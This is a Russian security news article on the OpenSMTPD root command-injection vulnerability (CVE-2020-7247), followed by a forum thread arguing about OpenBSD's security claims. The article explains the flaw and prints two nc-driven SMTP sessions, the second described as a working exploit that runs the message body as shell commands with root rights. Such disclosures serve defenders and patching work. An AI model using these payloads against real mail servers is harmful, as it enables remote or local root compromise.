The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимость в OpenSMTPD, позволяющая удалённо выполнить код с правами root

29.01.2020 09:04

В развиваемом проектом OpenBSD почтовом сервере OpenSMTPD выявлена критическая уязвимость (CVE-2020-7247), позволяющая удалённо выполнить shell-команды на сервере с правами пользователя root. Уязвимость выявлена в ходе повторного аудита, проведённого компанией Qualys Security (прошлый аудит OpenSMTPD проводился в 2015 году, а новая уязвимость присутствует с мая 2018 года). Проблема устранена в выпуске OpenSMTPD 6.6.2. Всем пользователям рекомендуется срочно установить обновление (для OpenBSD исправление можно установить через syspatch).

Предложено два варианта атаки. Первый вариант работает в конфигурации OpenSMTPD по умолчанию (приём запросов только с localhost) и позволяет эксплуатировать проблему локально, когда атакующий имеет возможность обратиться к локальному сетевому интерфейсу (loopback) на сервере (например, на системах хостинга). Второй вариант проявляется в случае настройки OpenSMTPD для приёма внешних сетевых запросов (почтовый сервер, принимающий стороннюю почту). Исследователями подготовлен прототип эксплоита, который успешно работает как с вариантом OpenSMTPD из состава OpenBSD 6.6, так и с переносимой версией для других ОС (проведено в Debian Testing).

Проблема вызвана ошибкой в функции smtp_mailaddr(), вызываемой для проверки корректности значений в полях "MAIL FROM" и "RCPT TO", определяющих отправителя/получателя и передаваемых в ходе соединения с почтовым сервером. Для проверки части почтового адреса, идущей перед символом "@", в smtp_mailaddr() вызывается функция valid_localpart(), которая считает допустимыми (MAILADDR_ALLOWED) символы "!#$%&'*/?^`{|}~+-=_" в соответствии с требованиями RFC 5322.

При этом непосредственное экранирование строки производится в функции mda_expand_token(), которая заменяет только символы "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). В дальнейшем подготовленная в mda_expand_token() строка используется при вызове агента доставки (MDA) при помощи команды 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...'. В случае помещения письма в mbox через /bin/sh запускается строка "/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}", где значение "%{mbox.from}" включает экранированные данные из параметра "MAIL FROM".

Суть уязвимости в том, что smtp_mailaddr() имеет логическую ошибку, из-за которой в случае передачи пустого домена в email функция возвращает успешный код проверки, даже если часть адреса до "@" содержит недопустимые символы. Далее при подготовке строки функцией mda_expand_token() экранируются не все возможные спецсимволы shell, а только спецсимволы, допустимые в почтовом адресе. Таким образом, для запуска своей команды достаточно использовать в локальной части email символ ";" и пробел, которые не входят в набор MAILADDR_ESCAPE и не экранируются. Например:


   $ nc 127.0.0.1 25
   
   HELO professor.falken
   MAIL FROM:<;sleep 66;>
   RCPT TO:<root>
   DATA
   .
   QUIT

После данного сеанса OpenSMTPD при доставке в mbox запустит через shell команду


   /usr/libexec/mail.local -f ;sleep 66; root

При этом возможности атаки ограничиваются тем, что локальная часть адреса не может превышать 64 символа, а спецсимволы '$' и '|' заменяются на ":" при экранировании. Для обхода данного ограничения использован тот факт, что тело письма передаётся после запуска /usr/libexec/mail.local через входной поток, т.е. через манипуляции с адресом можно запустить только командный интерпретатор sh и задействовать тело письма как набор инструкций. Так как в начале письма указываются служебные SMTP-заголовки, для их пропуска предлагается использовать вызов команды read в цикле. Рабочий эксплоит приобретает примерно такой вид:


   $ nc 192.168.56.143 25

   HELO professor.falken
   MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
   RCPT TO:<root@example.org>
   DATA
   #0
   #1
   ...
   #d
   for i in W O P R; do
        echo -n "($i) " && id || break
   done > /root/x."`id -u`"."$$"
   .
   QUIT


  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: Уязвимость в ld.so OpenBSD
  3. OpenNews: Уязвимости в OpenBSD, позволяющие повысить привилегии и обойти аутентификацию в smtpd, ldapd и radiusd
  4. OpenNews: Выпуск OpenBSD 6.6
  5. OpenNews: OpenBSD перешёл на использование OpenSMTPD по умолчанию
  6. OpenNews: В развиваемом проектом OpenBSD SMTP-сервере OpenSMTPD выявлена порция уязвимостей
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/52267-opensmtpd
Ключевые слова: opensmtpd, openbsd
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (151) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Spoofing (?), 09:57, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    это не уязвимость, повторяю, НЕ УЯЗВИМОСТЬ.
    в OpenBSD уязвимостей нет, а все сервисы что вы запускаете сами -- вы запускаете сами, повторяю, ЗАПУСКАЕТЕ САМИ.
     
     
  • 2.5, Аноним (5), 10:08, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +11 +/
    Найс аутотренинг
     
     
  • 3.30, pda (?), 13:43, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Это не аутотренинг, это стёб над позицией разработчиков опёнка.
     
     
  • 4.31, Дон Ягон (ok), 13:50, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > это стёб над позицией разработчиков опёнка

    Демонстрирующий, главным образом, непонимание этой самой позиции.

     
     
  • 5.131, pda (?), 03:08, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Так разъясните. Они любят заострять внимание на "Only two remote holes in the default install, in a heck of a long time!". А что у них включено по умолчанию? ntpd и sshd? Очешуенный сервер. Так и я могу. Напишу сейчас "hello world" и в нём за 100500 лет не найдут ни одной удалённой уязвимости. Только какой в этом толк?

    Или я чего-то не понимаю?

     
     
  • 6.145, Дон Ягон (ok), 14:53, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Only two remote holes in the default install, in a heck of a long time - это ... большой текст свёрнут, показать
     
     
  • 7.156, pda (?), 00:42, 03/02/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Искренне не понимаю, почему слоган вызывает такое количество волнений.

    Потому что выглядит как попытка ввести в заблуждение. Люди ожидают от "default install" то, что устанавливается/доступно в поставке от разработчиков. Они гордятся собой - молодцы. Любому пользователю опёнка от этого ни горячо ни холодно. Любая система, повторюсь, ставится для чего-то. Для практической эксплуатации.

    Так что для пользователей честный слогон не "всего две уязвимости за дцать лет", а "у нас бывают дырки, как и у всех".

     
     
  • 8.157, Дон Ягон (ok), 12:39, 03/02/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Для кого Для тех, кто не умеет читать Для тех кто не в курсе про наличие темат... большой текст свёрнут, показать
     
  • 2.20, Дон Ягон (ok), 12:21, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > это не уязвимость
    > в OpenBSD уязвимостей нет

    Разработчики OpenSMTPD говорят, что есть. Но тебе, конечно, виднее.

    "Qualys has found a critical vulnerability"

    ( https://www.mail-archive.com/misc@opensmtpd.org/msg04850.html )

     
     
  • 3.24, XL (?), 13:14, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –6 +/
    Спасибо ребятам из Qualys, которые на деле показали, что OpenBSD мало чем отличается от других ОС в плане багов и уязвимостей. Искать какой-то мифической супер-пупер безопасности тут бессмысленно. Просто на эту ОС редко кто обращает внимание и мало кто ей пользуется - отсюда и мифы все. Типичные неуловимые Джо. Хотя лично я не удивлён. В наш век маркетинга, рекламы всё это довольно типично.
     
     
  • 4.26, Аноним (26), 13:27, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Конечно, мало чем. Всего лишь реакцией за считанные дни и часы вместо замалчивания в течение месяцев.
     
  • 4.27, Дон Ягон (ok), 13:30, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +9 +/
    > Спасибо ребятам из Qualys, которые на деле показали, что OpenBSD мало чем отличается от других ОС в плане багов и уязвимостей.

    Ага, и не в первый раз уже. Как ни найдут дыру в OpenBSD, так сразу "на деле показали".
    Я тебе сейчас ещё на деле покажу, постарайся только со стула не упасть: https://www.cvedetails.com/vulnerability-list/vendor_id-97/Openbsd.html

    Не благодари.

    > Искать какой-то мифической супер-пупер безопасности тут бессмысленно.

    "Мифическую супер-пупер безопасность" ищут только недалёкие дебилы. Защищаются от кого-то/чего-то, а дыры или прочие ошибки есть примерно во всём, что сделал человек.

    > В наш век маркетинга, рекламы всё это довольно типично.

    В наш век маркетинга и рекламы типично кукарекать не разобравшись в вопросе.
    "Безопасность по-умолчанию" - один из принципов производства OpenBSD - это история не про то, что в OpenBSD нет ошибок, а про то, что ошибки есть _ВЕЗДЕ_ и безопасные (читай: параноидально-минималистичные) настройки по-умолчанию - это способ по максимуму предотвратить эксплуатацию дыр, которые в системе по любому есть, просто про них ещё могут не знать.
    Например, благодаря тому, что OpenSMTPD по-умолчанию слушает только локалхост, мы имеем local root, а не remote root.

    А товарищам из Qualys действительно спасибо, они делом, а не словом помогают делать OpenBSD лучше и безопаснее.

     
     
  • 5.28, ssh (ok), 13:38, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Я тебе сейчас ещё на деле покажу, постарайся только со стула не упасть: https://www.cvedetails.com/vulnerability-list/vendor_id-97/O...

    Ты зачем сразу с козырей то зашел! :)

     
  • 5.50, Zulu (?), 16:24, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –6 +/
    > Например, благодаря тому, что OpenSMTPD по-умолчанию слушает только локалхост, мы имеем local root, а не remote root.

    То есть преимущество OpenBSD над другими системами это настройки по умолчанию? Т.е. OpenBSD это система для тех, кто не в состоянии настроить сервисы так, как ему нужно? Так вы этого слона не продадите.

     
     
  • 6.59, Дон Ягон (ok), 17:12, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > То есть преимущество OpenBSD над другими системами это настройки по умолчанию?

    Это один из способов снижения вреда от уязвимостей. Естественно, всех проблем не решающий.

    > Т.е. OpenBSD это система для тех, кто не в состоянии настроить сервисы так, как ему нужно?

    Не знаю, как на это ответить. Тем более, что это явный троллинг.

    Попробуйте обосновать, зачем бы OpenSMTPD по-умолчанию слушать что-то отличное от localhost, когда не получится, возможно, станет понятно, о чём я.

     
     
  • 7.69, Zulu (?), 18:09, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Попробуйте обосновать, зачем бы OpenSMTPD по-умолчанию слушать что-то отличное от localhost, когда не получится, возможно, станет понятно, о чём я.

    Я стараюсь намекнуть на то, что безопасность надо сравнивать при сопоставимых функциях, без этого получается сравнение теплого с мягким, поэтому фраза "Например, благодаря тому, что OpenSMTPD по-умолчанию слушает только локалхост, мы имеем local root, а не remote root" бессмысленна.

     
     
  • 8.74, Дон Ягон (ok), 18:24, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Смотря в каком контексте рассматривать Если речь об использовании OpenSMTPD как... большой текст свёрнут, показать
     
  • 7.89, sstj3n (?), 20:37, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Зачем тогда в принципе устанавливать программу, которая  в дефолтных настройках бесполезна в 99 случаях из ста? Сравнивать надо именно конфигурации, полезные большинству. Так-то и sshd можно на локалхост повесить в дистре и объявить его "самым безопасТъным". Ну да, безопасно, а толку-то с него?
     
     
  • 8.91, Дон Ягон (ok), 21:05, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    вздыхает Ты не знаешь, зачем нужен локальный почтовик в юниксах UPD И да, бл... текст свёрнут, показать
     
     
  • 9.112, sstj3n (?), 10:31, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Речь не о том, зачем он там нужен, а о том, насколько он необходим для функциони... текст свёрнут, показать
     
     
  • 10.123, Дон Ягон (ok), 13:34, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    В стандартной поставке он нужен рутовые нотификации , далее ты можешь настроить... большой текст свёрнут, показать
     
     
  • 11.142, sstj3n (?), 09:43, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Как же туго-то Суть примеров если то, что ты называешь адекватными настройк... большой текст свёрнут, показать
     
     
  • 12.146, Дон Ягон (ok), 15:50, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ты или слушаешь в пол уха или не хочешь понимать меня, похоже Core functionalit... большой текст свёрнут, показать
     
  • 11.154, Дон Ягон (ok), 03:00, 01/02/2020 [^] [^^] [^^^] [ответить]  
  • +/
    В смысле письма от всяких демонов на root host Как мне показалось, формулировк... текст свёрнут, показать
     
  • 9.113, Анонимус2 (?), 11:21, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем вообще локальному почтовику слушать smtp Насколько я помню в debian exim ... текст свёрнут, показать
     
  • 9.122, Аноним (122), 13:24, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И зачем, если локально хватает MTA типа DMA man dma ... текст свёрнут, показать
     
     
  • 10.124, Дон Ягон (ok), 13:37, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    DMA - очень хороший вариант, да и вообще стрекоза мне нравится В OpenBSD вмес... текст свёрнут, показать
     
  • 9.155, Дон Ягон (ok), 03:19, 01/02/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Я обманул, инсталлятор спрашивает о том, запускать по дефолту или нет ... текст свёрнут, показать
     
  • 6.66, Аноним (66), 18:00, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Мы и не продаём "слона".
     
  • 4.53, OpenEcho (?), 16:55, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Просто на эту ОС редко кто обращает внимание и мало кто ей пользуется - отсюда и мифы все.

    Т.е. General Motors, JPL не в счет ?

     
     
  • 5.61, Дон Ягон (ok), 17:22, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Т.е. General Motors, JPL не в счет ?

    Можно каких-то пруфов? Не то, чтобы я сомневаюсь или не верю, просто люблю, когда пруфы есть, а сходу ничего не нагуглилось.

     
     
  • 6.78, OpenEcho (?), 19:30, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Информация инсайдерская, поэтому сорри, пруфов не будет, хотите верьте, хотите нет, хотя если интересно, попробуйте

    https://enlyft.com/tech/products/openbsd

     
     
  • 7.81, Дон Ягон (ok), 19:37, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Информация инсайдерская, поэтому сорри, пруфов не будет, хотите верьте, хотите нет

    Ничего в моей жизни не изменится от того, поверю я или нет. Также ничего не изменится от того, является ли эта информация правдой или ложью.
    Интересен как раз опыт и/или практический пример успешного использования.

    А так - да я может быть и верю, а толку то?

    ИМХО, нет смысла приводить подобные примеры без каких-либо пруфов. Даже если это правда.

     
     
  • 8.82, OpenEcho (?), 19:45, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Полностью согласен, sorry, просто обидно за опенку стало, сорвалось Надеюсь л... текст свёрнут, показать
     
  • 2.80, Аноним (80), 19:34, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Разумеется. Это вебмакаки опять тру ветеранам сишникам из BSD баги в код залили. Шелл, юникс и си не при чем.
     
     
  • 3.116, Michael Shigorin (ok), 12:53, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Мсье сейчас, разумеется, расскажет, как от ЛОГИЧЕСКИХ ошибок в АЛГОРИТМЕ страхует какой-нить silverbulletLanguage.  Ну или балабол, как водится.
     
     
  • 4.130, Аноним (80), 15:37, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Простите, Михаил, но тут не какие-то абстрактные логические ошибки. Конкретно этот дефект следует из самой сути философии юникс, тут сошлись три столпа: шелл, си и то, что с целью упрощения код можно писать на о....сь. Этот баг КРАЙНЕ юниксвеен.
     
     
  • 5.133, Аноним (-), 06:59, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Это какой-то очень специфичный вариант юниксвэя - так странно sh звать прямо хардкодом стремной конструкции в коде сишной проги.

    Если в опенке где-то и есть security in mind - то явно не в таком фрагменте кода как зацитирован. Вызывать шелл с юзерскими данными затея заведомо ссыкотная.

     
     
  • 6.150, Дон Ягон (ok), 17:50, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    https://www.opennet.ru/openforum/vsluhforumID3/119631.html#147
     
  • 6.153, Аноним (80), 18:50, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Это юниксвей тот самый, изначальный, лазоревый, который worse is better. Простота лучше правильности.
     
  • 2.83, Аноним (83), 19:58, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    +15 – поняли очевидный сарказм
    -23 – не поняли
     
  • 2.132, Аноним (-), 06:57, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Э, вот пардон, сервис под "маркой" OpenSMTPD изначально маркетировавшийся как "секурный", код типа



    'execle("/bin/sh", "/bin/sh", "-c", mda_command,...'



    Как-то вообще совсем не украшает. Это вот это вот - дизайнилось для секурити? Вот прям с командой шеллу формируемой из данных отгруженных пользователей? И, кстати, нафиг эта штука под рутом работает? Объясните наивному - что в его функциональности требует рут?! А то я глупый линуксоид и не догоняю зачем такой программе рут вперся.
     
     
  • 3.147, Дон Ягон (ok), 17:21, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Qmail When a mail message arrives, qmail-local runs sh -c command in your hom... большой текст свёрнут, показать
     
  • 2.138, Аноним (-), 07:50, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    #define BUG FEATURE, мде? :)
     

     ....большая нить свёрнута, показать (43)

  • 1.2, A.Stahl (ok), 09:58, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –11 +/
    Неуловимого Джо таки поймали. И при этом, к его большому огорчению, поймали не случайно, а ловили целенаправленно. Так что ему уже не отвертеться и ему будет очень больно.
     
     
  • 2.19, антикудах (?), 11:47, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +8 +/
    https://mobile.twitter.com/OpenSMTPD/status/1222288467046076417

    А это он так пытается отвертеться, да? Задолбали ыксперты.

     

  • 1.4, Аноним (4), 10:02, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    На странице Goals их сайта первая же строка: "Be as secure as possible."
     
     
  • 2.134, Аноним (-), 07:07, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Что-то 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...' не выглядит в этом ключе, уж сорри.
     
     
  • 3.151, Дон Ягон (ok), 17:51, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Что-то 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...' не выглядит в этом ключе, уж сорри.

    https://www.opennet.ru/openforum/vsluhforumID3/119631.html#147

     

  • 1.6, Анонимус2 (?), 10:16, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    >sh -c ""

    Вообще я бы за такое выгонял из профессии навсегда, но в секьюрном бсд видимо лучше знают как писать безопасно

     
     
  • 2.11, Аноним (11), 10:47, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Будьте так добры, накидайте ссылочек, как необходимо делать по вашему мнению.
     
     
  • 3.13, Нононим (?), 10:54, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Оне выгонять учились, а не тому как надо делать.
     
  • 3.22, Аноним (22), 12:40, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Смотри postfix
     
     
  • 4.25, Дон Ягон (ok), 13:20, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Смотри postfix

    Тот же postfix тоже позволяет запускать команду mda шеллом.

    https://github.com/vdukhovni/postfix/blob/master/postfix/src/global/pipe_comma
    https://github.com/vdukhovni/postfix/blob/master/postfix/src/local/command.c#L

    Да, старается этого избегать, по возможности. Но сам факт - некоторую функциональность логичнее реализовывать именно так, а не писать свой недо-sh.

    Проблема не в том, что процесс OpenSMTPD запускает какие-то субкоманды шелом, а в том, что недостаточно хорошо проверяет входные данные.

     
     
  • 5.41, Ordu (ok), 14:52, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Не совсем То что он недостаточно хорошо проверяет -- это проблема Но то, что о... большой текст свёрнут, показать
     
     
  • 6.44, Дон Ягон (ok), 15:13, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Для начала, спасибо за развёрнутое сообщение с текстом по существу вопроса Если... большой текст свёрнут, показать
     
     
  • 7.62, Ordu (ok), 17:43, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Во-первых, там не нужна валидация Нельзя сказать, чтобы совсем не нужна, но сра... большой текст свёрнут, показать
     
     
  • 8.86, Дон Ягон (ok), 20:04, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Описанная проблема понятна, её разработчики OpenSMTPD пытаются решать списком до... большой текст свёрнут, показать
     
     
  • 9.102, Ordu (ok), 00:27, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Да, но и тем не менее логическая ошибка в коде экранизации привела к возможности... большой текст свёрнут, показать
     
     
  • 10.129, Дон Ягон (ok), 14:38, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Сори за долгий ответ, не хотелось отвечать совсем не подумав Я такого способа н... большой текст свёрнут, показать
     
  • 8.90, Дон Ягон (ok), 20:54, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, в случае libsh условного , мы бы вызывали саму программу Но тогда бы да... большой текст свёрнут, показать
     
  • 4.32, Аноним (11), 13:55, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Спс
     
  • 4.109, Аноним (109), 01:14, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Будьте так добры, накидайте ссылочек, как необходимо делать по вашему мнению.
    > Смотри postfix

    В postfix было так: https://www.exploit-db.com/exploits/34896
    Уязвимость в bash CVE-2014-6271. А подход в postfix такой же.

    Смотрите тогда уж qmail.

     
  • 3.114, Анонимус2 (?), 11:35, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Не делать вызов sh программно вообще никогда, не видел пока ни одной программы сложнее hello world где бы это не привело к уязвимостям. В данном случае - вызывать mail.local напрямую, без обёртки в виде шелла.
    Если уж администратору сильно захотелось запустить шелл - ему нужно дать возможность вместо mail.local запустить произвольный файл, пусть пишет его на чем угодно - хоть шелл, хоть си, хоть джаваскрипт.
     
     
  • 4.135, Аноним (-), 07:11, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Во-во. А если какие-то параметры отдать надо - то наверное все-таки не в sh -c, такая конструкция заведомо заявка на залет. Шелл больно уж много всего специально трактует так что кормить его из недоверяемых данных - чего, рута по DHCP все уже забыли, мыло было?
     

     ....большая нить свёрнута, показать (15)

  • 1.7, Аноним (7), 10:30, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Просто нужно запретить создание произвольных процессов. Вместо этого при вызове приложения ему нужно передавать список разрешённых бинарников с их аргументами командной строки. Бинарники вызывать из программы по псевдониму, при этом передача аргументов командной строки запрещена. Весь говнокод отломается, туда ему и дорога. Придётся переписывать все программы на нормальную архитектуру: как разделяемые библиотеки с внешним API.
     
     
  • 2.84, Аноним (83), 20:02, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    SELinux это умеет? Или другое решение?
     
     
  • 3.103, Аноним (7), 00:31, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, не умеет. Это capability-based security. См. не взлетевший cloudABI.
     
  • 3.115, phaoost (ok), 11:39, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    SELinux в OpenBSD???
     
     
  • 4.136, Аноним (-), 07:14, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    У них, кстати, pledge есть. Он что, не умеет лимитировать параметры сисколов? Впрочем если юзерь может в sh -c как рут, толку с этого будет довольно маргинально, любой кулхацкер за 10 минут с -c изобразит что-нибудь годное даже так.
     
  • 3.159, исчо_адын_гентушнег (?), 16:22, 04/02/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >SELinux это умеет? Или другое решение?

    на селе можно, но для 99%  цЫкурити-админов сильно сложно ( ибо редхад методички в редхад включают только таргет полиси). А так да, отловить exec* сель может, аргументы тоже.
    На настоящей RBASC -  как 2 пальца об асфальт, но они все платные

     

  • 1.15, Аноним (15), 10:56, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +10 +/
    Ага, все-таки можно настраивать сервер через SMTP!
    А то все SSH, да SSH...
     
     
  • 2.16, neAnonim (?), 11:11, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –4 +/
    Ну блин всегда так делал, а тут понабежали. Повторяю это НЕ БАГ, это фича.
     
     
  • 3.37, Аноним (37), 14:42, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Именно! АНБ просили "сделать возможнность", им сделали. А тут пришли какие-то анализаторы и нашли сделанное. Ну вот как после этого доверять всяким аудитам? А как же "национальная безопасность"? Она же важнее.
     
  • 2.17, Аноним (17), 11:15, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    ЫХыххыхы :)
     

  • 1.18, Аноним (18), 11:44, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –6 +/
    Неуловимый Джо отбегался по прериям...
     
     
  • 2.87, Аноним (87), 20:16, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    И ни меча, ни лат, и лицом в салат до утра - вот и все дела...
     

  • 1.21, Дон Ягон (ok), 12:27, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Двоякие ощущения. С одной стороны хорошо, что нашли, с другой - похожее уже было, когда ж закончится? И тоже, кстати, Qualys нашли - https://www.opennet.ru/opennews/art.shtml?num=43090
    (К разговору о том, что "за openbsd взялись всерьёз". Ага, взялись, ещё в 2015 году).
     
  • 1.23, Аноним (-), 13:09, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    Самая бестолковая из всех *bsd и этот хайп про безопасность... ОС для фанатиков - вот только эффект Плацебо тут не работает.
     
     
  • 2.38, Аноним (37), 14:43, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Есть ещё NetBSD, которая без хайпа...
     
     
  • 3.40, Аноним (40), 14:51, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Есть ещё NetBSD, которая без хайпа...

    ... и без каких-либо заметных достоинств вообще.

     
     
  • 4.42, Дон Ягон (ok), 14:56, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > и без каких-либо заметных достоинств вообще.

    Это, конечно же, не так. NetBSD вполне себе достойная ОС.

     
     
  • 5.117, Michael Shigorin (ok), 12:57, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Как минимум там есть Чеусов ;-)
     
     
  • 6.125, Дон Ягон (ok), 13:45, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Как минимум там есть Чеусов ;-)

    Мне это мало о чём говорит. Погуглил, нашёл про nih (пакетный менеджер), вспомнил, что когда-то читал про это и ещё что-то. Но и только.

    Но, в любом случае, NetBSD  - это хорошо ;)

     
  • 4.46, 11 (?), 16:16, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > ... и без каких-либо заметных достоинств вообще.

    NetBSD и по безопасности (внезапно, да!?), и по сетевой подсистеме и по многим другим вещам наголову выше деревянной и упоротой OpenBSD. Просто там народ взрослый, опытный, спокойный и скромный. А компашка + Тео - толпа каких-то неврастеников с ЧСВ (не просто же так Тео выперли и команды NetBSD). NetBSD особо не рекламируют себя, тихо, мирно работают в своё удовольствие. То же самое касательно качества кода - поддержка вагона платформ обязывает писать унифицированный, хорошо продуманный код. НетБСД пишет профессура для души, а опенбсд/фрибсд пишут гики вроде Тео или какой-нибудь яндекс.

     
     
  • 5.54, Дон Ягон (ok), 16:55, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +4 +/
    При всех моих симпатиях к NetBSD как и к прочим BSD-системам , в комментарии на... большой текст свёрнут, показать
     
     
  • 6.93, Аноним (-), 21:12, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Опять словоблудие... Ещё себе пару плюсиков поставь... Секта она и есть секта...
     
     
  • 7.96, Дон Ягон (ok), 21:25, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Зато ты предельно конкретен, ага.
    Сколько надо, столько и поставлю, у тебя спрошу только когда ты научишься аргументировать мысли, а не переходить на личности.
     
  • 5.55, Аноним (55), 17:04, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    От openssh ты конечно уже отказался?
     
     
  • 6.92, Аноним (-), 21:11, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > От openssh ты конечно уже отказался?

    Отродясь не пользовался.

     
     
  • 7.98, Аноним (98), 21:33, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    >> От openssh ты конечно уже отказался?
    > Отродясь не пользовался.

    дропбер + путти + локалхост онли одмин = твое все?

     
     
  • 8.118, Michael Shigorin (ok), 12:58, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Тогда скорее Далее, далее, далее, ОК ... текст свёрнут, показать
     
  • 4.85, Аноним (83), 20:03, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Она работает на VAX! И на тостерах!
     
  • 4.143, Аноним (-), 09:51, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > ... и без каких-либо заметных достоинств вообще.

    HammerFS? Единственные из BSDшников кто смог хотя-бы попытаться сделать приличную современную файловую систему...

     
     
  • 5.148, Дон Ягон (ok), 17:24, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > HammerFS

    HAMMER разрабатывается в DragonflyBSD, Мэттом Диллоном и компанией.

